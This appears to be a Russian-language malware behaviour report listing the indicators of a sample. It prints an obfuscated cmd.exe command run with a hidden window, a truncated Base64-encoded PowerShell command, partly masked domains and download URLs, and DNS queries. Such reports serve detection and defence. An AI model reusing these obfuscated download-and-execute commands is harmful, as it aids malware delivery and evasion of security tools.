Техническая информация
- '<SYSTEM32>\cmd.exe' jfkHMIjziHk jjPvMLiGRdALZtZPVMp jwZCtAJ & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %KdIiqpvOTmJdYzV%=CkvmPGkMu&&set %I<Имя файла>suIYkm%=p&&set %XaubvbwGN%=o^...
- 'eq##lf.com':443
- 'la####hillinn.com':80
- 'la####hillinn.com':443
- 'pk#.goog':80
- 'mb###ell.com':80
- 'mb###ell.com':443
- 'me####r-spec.com':80
- 'me####r-spec.com':443
- 'si###tjoe.ca':80
- http://la####hillinn.com/NRooitjL/
- http://pk#.goog/gsr1/gsr1.crt
- http://mb###ell.com/t6FDuI/
- http://me####r-spec.com/nz5fMF/
- http://si###tjoe.ca/iwaX88CvEu/
- 'eq##lf.com':443
- 'la####hillinn.com':443
- 'mb###ell.com':443
- 'me####r-spec.com':443
- DNS ASK eq##lf.com
- DNS ASK la####hillinn.com
- DNS ASK pk#.goog
- DNS ASK mb###ell.com
- DNS ASK me####r-spec.com
- DNS ASK si###tjoe.ca
- '<SYSTEM32>\cmd.exe' jfkHMIjziHk jjPvMLiGRdALZtZPVMp jwZCtAJ & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %KdIiqpvOTmJdYzV%=CkvmPGkMu&&set %I<Имя файла>suIYkm%=p&&set %XaubvbwGN%=o^...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAmACAAKAAgACQAZQBuAFYAOgBDAG8AbQBTAFAARQBDAFsANAAsADIANgAsADIANQBdAC0ASgBvAGkAbgAnACcAKQAgACgATgBlAFcALQBPAGIASgBFAEMAVAAgAEkATwAuAHMAdAByAEUAYQBNAFIAZQBhAGQARQBSACgAKABOAGUAVwAtAE8AYgBKAE...